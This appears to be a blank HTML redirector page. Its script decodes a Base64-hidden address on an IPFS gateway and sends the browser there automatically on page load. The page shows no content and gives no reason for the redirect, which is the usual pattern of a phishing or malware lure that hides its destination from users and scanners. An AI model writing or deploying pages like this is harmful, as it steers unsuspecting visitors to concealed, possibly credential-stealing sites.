<!doctype html><html><head><script type="text/JavaScript">
// Base64-encoded URL
var data = ""
const base64Url = "aHR0cHM6Ly9pcGZzLmlvL2lwZnMvUW1kSjNnbXV6azZTang1QlJLY3F3QURMdDZiZWNQVmlyeGYz
M2Y0bURKcDVnRQ==";

// Decode the Base64 URL
const decodedUrl = atob(base64Url);
var redir_to_page = decodedUrl;
// Redirect to the decoded URL
redir_to = redir_to_page + data;
window.location = redir_to;
</script></html>